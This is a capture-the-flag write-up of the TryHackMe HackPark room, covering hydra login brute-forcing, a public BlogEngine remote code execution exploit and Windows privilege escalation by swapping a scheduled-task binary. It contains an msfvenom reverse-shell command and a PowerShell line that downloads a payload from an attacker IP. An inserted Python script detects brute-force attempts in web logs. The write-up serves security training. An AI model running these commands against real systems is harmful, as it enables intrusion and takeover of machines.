###### tags: `TryHackMe OffensiveSecurity AdvancedExploitation`
# HackPark
:::info
This room will cover brute-forcing an account's credentials, handling public exploits, using the Metasploit framework and privilege escalation on Windows.
:::
## Using hydra to brute-force a login
Hydra is a parallelized, fast and flexible login cracker. If you don't have Hydra installed or need a Linux machine to use it, you can deploy a powerful Kali Linux machine and control it in your browser!
Brute-forcing can mean trying every possible combination of characters for a password. Dictionary attacks are also a type of brute-forcing, where we iterate through a wordlist to obtain the password.

We need to find a login page to attack and identify what type of request the form is making to the webserver. Typically, a form makes one of two types of requests to the web server: a **GET** request, which is used to request data from a webserver, or a **POST** request, which is used to send data to a server.
We can check what request a form is making by right-clicking on the login form, inspecting the element and then reading the value in the method field. You can also identify this if you are intercepting the traffic through BurpSuite (other HTTP methods can be found [here](https://www.w3schools.com/tags/ref_httpmethods.asp)).
Here is the login form we find:

I fill it with random values and intercept the request with BurpSuite in order to see which request type the website's login form is using.

We can see that the form is using a **POST** method.
Now that we know the request type and have a URL for the login form, we can start brute-forcing an account.
To do it, we'll use **hydra**, as mentioned above. **Hydra** really does have lots of functionality, and there are many "modules" available (an example of a module is `http-post-form`, which we will use). However, this tool is not only good for brute-forcing HTTP forms, but also other protocols such as FTP, SSH, SMTP, SMB and more.
Below is a mini cheatsheet:

The command we use:


For the command, I guessed that the username was **admin**. With that, I find the password, which is ***`1quaz2wsx`***.
:::success
I can now log in as the admin:
:::

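As an added defender's counterpart, not part of the original room or this writeup: a small Python script that flags the kind of login brute-force hydra's `http-post-form` module produces, by sliding a time window over POST requests to the login URL in web server logs. The log lines, the `/Account/login.aspx` path and the simplified W3C column layout are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in a simplified IIS-style W3C layout; the #Fields directive
# declares the column order so the parser does not assume one fixed layout.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2024-01-01 10:00:00 GET /Account/login.aspx 10.11.33.232 200
2024-01-01 10:00:01 POST /Account/login.aspx 10.11.33.232 200
2024-01-01 10:00:01 POST /Account/login.aspx 10.11.33.232 200
2024-01-01 10:00:02 POST /Account/login.aspx 10.11.33.232 200
2024-01-01 10:00:02 POST /Account/login.aspx 10.11.33.232 200
2024-01-01 10:00:03 POST /Account/login.aspx 10.11.33.232 200
2024-01-01 10:00:03 POST /Account/login.aspx 10.11.33.232 302
2024-01-01 10:05:00 POST /Account/login.aspx 192.0.2.10 200
2024-01-01 10:20:00 POST /Account/login.aspx 192.0.2.10 302
"""

def parse_w3c(text):
    """Yield one dict per log record, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def detect_bruteforce(text, login_path, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: {"attempts": n, "possible_success": bool}} for each client that POSTed
    to login_path at least `threshold` times inside any `window`-long span. possible_success
    is True when one of those POSTs got a 302, typically a login that succeeded."""
    events = defaultdict(list)  # ip -> [(timestamp, status), ...]
    for rec in parse_w3c(text):
        if rec["cs-method"] != "POST" or rec["cs-uri-stem"].lower() != login_path.lower():
            continue
        ts = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        events[rec["c-ip"]].append((ts, rec["sc-status"]))
    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end, (ts, _) in enumerate(evs):
            while ts - evs[start][0] > window:  # drop events older than the window
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = {"attempts": len(evs),
                               "possible_success": any(s == "302" for _, s in evs)}
                break
    return flagged
```

A single hit followed by silence is the pattern to look for: hydra stops at the first valid credential, so the burst of 200s ending in a 302 is the login that worked.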
## Compromising the machine
In this task, I will identify and execute a public exploit (from exploit-db.com) to get initial access to this Windows machine!
1. First, I identify the version of BlogEngine:

- Version: 3.3.6.0
2. Use the `searchsploit` command to find any vulnerabilities related to this version:
- `searchsploit BlogEngine`

I find that there is a remote code execution vulnerability associated with the version of BlogEngine we have.
I download the associated exploit with this command:
- `searchsploit -m "name of the exploit"`

After reading the exploit code, I modify a few details such as the IP address and the port we will be listening on. The author of the exploit also advises renaming the file, which I do.
Now that the exploit is ready, I start a TCP listener with **netcat** on the IP and port configured in the exploit.

Let's upload the exploit to the web app and trigger it:


After triggering the exploit, I gain initial access:

## Privilege escalation
First we will pivot from netcat to a meterpreter session and use this to enumerate the machine to identify potential vulnerabilities. We will then use this gathered information to exploit the system and become the Administrator.
Our netcat session is a little unstable, so let's generate another reverse shell using **msfvenom**.
### Pivot from netcat to meterpreter
1. Create the reverse shell with msfvenom
`msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.33.232 LPORT=2345 -f exe -o shell.exe`

2. Create a web server with Python so the shell can be downloaded from the initial netcat shell

3. Use Metasploit to listen for the incoming connection

4. Download the reverse shell and start it in the netcat session
`powershell -c "Invoke-WebRequest -Uri 'http://10.11.33.232:8000/shell.exe' -OutFile 'c:\windows\temp\shell.exe'"`

5. Back in Metasploit, we see the meterpreter shell

From here, I can run Metasploit commands such as `sysinfo` to get detailed information about the Windows system...

Using the `ps` command to look at running processes, I found an *abnormal service* running: `WindowsScheduler`.
Then, from the WindowsScheduler logs, we see that `Message.exe` is executed about every 30 seconds as `administrator`:

We can take advantage of this by replacing Message.exe with our reverse shell so that it is executed as Administrator.
1. Create another reverse shell with msfvenom with the name Message.exe

2. Download the new Message.exe into the same directory where the original Message.exe is

3. Use Metasploit to listen for the new connection on the new port and wait
:::success
After some seconds, we have a meterpreter as Administrator.
:::